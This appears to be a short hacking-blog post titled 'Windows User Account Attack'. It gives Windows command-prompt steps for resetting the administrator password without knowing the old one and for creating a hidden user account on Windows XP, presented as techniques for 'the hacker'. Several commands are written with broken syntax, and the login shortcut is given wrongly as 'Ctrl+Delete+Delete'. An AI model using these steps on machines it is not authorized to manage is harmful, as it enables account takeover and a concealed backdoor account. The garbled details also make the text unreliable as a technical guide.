WINDOWS USER ACCOUNT ATTACK


Start>Run>cmd     or   start>cmd (in search) >cmd.exe(right click >run as administrator)
-To see all the account present on the computer:  (type it)            
net user    
-To change the password without knowing the old password:       
net user administrator*
-To make a new user account:                                                             
 net user fullonhacking /add
-To delete Existing user account                                         
net user fullonhacking/delete
-To make hidden account in computer(works only  in windows xp)  
                             net user fullonhacking/add
net localgroup users fullonhacking/delete

Note:
          To login to this Hidden Account Press
          Ctrl+Delete+Delete
          And give the hidden user name in user name field and password respectively.
          And the above are to be executed in command prompt. And the hacker indicates the respective user name.  Or the name of the account.

0 comments:

Post a Comment